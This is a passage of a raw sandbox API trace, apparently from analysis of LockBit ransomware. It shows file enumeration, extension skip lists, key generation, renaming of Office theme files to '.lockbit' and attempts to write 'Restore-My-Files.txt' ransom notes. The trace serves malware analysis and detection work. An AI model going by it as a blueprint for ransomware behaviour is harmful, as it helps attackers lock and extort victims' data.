ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x53af, dwReserved0=0x0, dwReserved1=0x0, cFileName="Perspective.eftx", cAlternateFileName="PERSPE~1.EFT")) returned 1 [0195.264] lstrcmpiW (lpString1=".", lpString2="Perspective.eftx") returned -1 [0195.264] lstrcmpiW (lpString1="..", lpString2="Perspective.eftx") returned -1 [0195.264] PathFindExtensionW (pszPath="Perspective.eftx") returned=".eftx" [0195.264] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0195.264] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0195.264] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0195.265] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0195.265] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0195.265] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0195.265] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0195.265] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0195.265] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0195.265] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0195.265] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0195.265] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0195.265] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0195.265] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0195.265] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0195.265] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0195.265] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0195.265] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0195.265] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0195.265] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0195.265] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0195.265] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0195.265] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0195.265] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0195.265] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.265] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0195.265] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0195.265] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0195.266] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0195.266] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0195.266] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Perspective.eftx") returned 1 [0195.266] lstrcmpiW (lpString1="ntldr", lpString2="Perspective.eftx") returned -1 [0195.266] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Perspective.eftx") returned -1 [0195.266] lstrcmpiW (lpString1="bootsect.bak", lpString2="Perspective.eftx") returned -1 [0195.266] lstrcmpiW (lpString1="autorun.inf", lpString2="Perspective.eftx") returned -1 [0195.267] lstrcmpiW (lpString1="thumbs.db", lpString2="Perspective.eftx") returned 1 [0195.267] lstrcmpiW (lpString1="iconcache.db", lpString2="Perspective.eftx") returned -1 [0195.267] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0195.267] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned=".eftx" [0195.267] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0195.267] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0195.267] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0195.267] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0195.267] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0195.267] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0195.267] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0195.267] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0195.267] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0195.267] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0195.267] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0195.267] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0195.267] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0195.267] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0195.267] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0195.267] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0195.267] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0195.267] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0195.267] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0195.267] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0195.267] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0195.268] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0195.268] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0195.268] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0195.268] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0195.268] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0195.268] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0195.268] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0195.268] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx.lockbit") returned 92 [0195.268] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0195.269] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.270] malloc (_Size=0x40068) returned 0x1ff1e60 [0195.270] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=21423) returned 1 [0195.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.270] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0195.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0195.271] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.279] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.280] malloc (_Size=0xce) returned 0x1fa2ed8 [0195.280] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xce, FileInformationClass=0xa) returned 0x0 [0195.282] free (_Block=0x1fa2ed8) [0195.282] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.282] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.282] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.282] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x583f3d00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c3cce0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x583f3d00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xbef29, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pushpin.eftx", cAlternateFileName="PUSHPI~1.EFT")) returned 1 [0195.282] lstrcmpiW (lpString1=".", lpString2="Pushpin.eftx") returned -1 [0195.282] lstrcmpiW (lpString1="..", lpString2="Pushpin.eftx") returned -1 [0195.282] PathFindExtensionW (pszPath="Pushpin.eftx") returned=".eftx" [0195.282] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0195.282] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0195.282] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0195.282] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0195.282] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0195.282] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0195.282] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0195.282] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0195.283] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0195.283] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0195.283] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0195.283] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0195.283] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0195.283] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0195.283] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0195.283] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0195.283] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0195.283] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0195.283] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0195.283] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0195.283] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0195.283] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0195.283] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0195.283] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0195.283] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.283] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0195.283] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0195.283] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0195.283] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0195.283] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0195.283] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0195.283] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0195.284] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0195.284] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0195.284] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0195.284] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0195.284] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0195.284] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0195.284] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0195.284] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0195.284] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0195.284] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0195.284] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.284] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0195.284] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0195.284] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0195.284] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0195.284] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pushpin.eftx") returned 1 [0195.284] lstrcmpiW (lpString1="ntldr", lpString2="Pushpin.eftx") returned -1 [0195.284] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pushpin.eftx") returned -1 [0195.284] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pushpin.eftx") returned -1 [0195.284] lstrcmpiW (lpString1="autorun.inf", lpString2="Pushpin.eftx") returned -1 [0195.285] lstrcmpiW (lpString1="thumbs.db", lpString2="Pushpin.eftx") returned 1 [0195.285] lstrcmpiW (lpString1="iconcache.db", lpString2="Pushpin.eftx") returned -1 [0195.285] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0195.285] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned=".eftx" [0195.285] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0195.285] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0195.285] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0195.285] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0195.285] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0195.285] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0195.285] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0195.285] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0195.285] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0195.285] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0195.285] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0195.285] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0195.285] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0195.285] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0195.285] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0195.285] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0195.285] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0195.285] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0195.285] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0195.285] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0195.285] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0195.286] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0195.286] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0195.286] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0195.286] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0195.286] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0195.286] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0195.286] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0195.286] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx.lockbit") returned 88 [0195.286] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0195.288] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.288] malloc (_Size=0x40068) returned 0x3df0008 [0195.288] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=782121) returned 1 [0195.288] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.289] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.289] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.289] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.290] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.295] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.295] malloc (_Size=0xc6) returned 0x1fa2ed8 [0195.295] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0195.302] free (_Block=0x1fa2ed8) [0195.302] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.302] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.302] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.302] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x845abe00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c62e40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x845abe00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x6c8d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Slipstream.eftx", cAlternateFileName="SLIPST~1.EFT")) returned 1 [0195.302] lstrcmpiW (lpString1=".", lpString2="Slipstream.eftx") returned -1 [0195.302] lstrcmpiW (lpString1="..", lpString2="Slipstream.eftx") returned -1 [0195.303] PathFindExtensionW (pszPath="Slipstream.eftx") returned=".eftx" [0195.303] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0195.303] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0195.303] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0195.303] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0195.303] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0195.303] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0195.303] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0195.303] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0195.303] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0195.303] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0195.303] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0195.303] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0195.303] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0195.303] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0195.303] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0195.303] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0195.303] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0195.303] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0195.303] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0195.303] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0195.303] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0195.303] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0195.303] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0195.303] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0195.303] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0195.304] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0195.304] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0195.304] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0195.304] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Slipstream.eftx") returned -1 [0195.304] lstrcmpiW (lpString1="ntldr", lpString2="Slipstream.eftx") returned -1 [0195.304] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Slipstream.eftx") returned -1 [0195.304] lstrcmpiW (lpString1="bootsect.bak", lpString2="Slipstream.eftx") returned -1 [0195.304] lstrcmpiW (lpString1="autorun.inf", lpString2="Slipstream.eftx") returned -1 [0195.305] lstrcmpiW (lpString1="thumbs.db", lpString2="Slipstream.eftx") returned 1 [0195.305] lstrcmpiW (lpString1="iconcache.db", lpString2="Slipstream.eftx") returned -1 [0195.305] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0195.305] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned=".eftx" [0195.305] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0195.305] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0195.305] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0195.305] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0195.305] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0195.305] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0195.305] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0195.305] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0195.305] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0195.305] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0195.305] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0195.305] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0195.305] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0195.305] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0195.305] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0195.305] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0195.305] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0195.305] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0195.305] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0195.305] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0195.305] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0195.305] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 